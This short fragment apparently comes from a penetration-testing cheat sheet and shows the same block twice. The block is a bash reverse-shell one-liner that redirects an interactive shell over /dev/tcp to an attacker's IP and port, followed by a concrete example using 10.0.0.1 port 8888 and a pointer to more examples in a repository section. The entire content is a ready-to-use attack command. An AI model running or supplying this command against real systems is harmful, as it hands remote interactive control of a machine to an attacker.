bash
Bash TCP
$ bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1
# eg.
$ bash -i >& /dev/tcp/10.0.0.1/8888 0>&1
Refer to the resources under Repository
section for more examples
Last updated
Bash TCP
$ bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1
# eg.
$ bash -i >& /dev/tcp/10.0.0.1/8888 0>&1
Refer to the resources under Repository
section for more examples
Last updated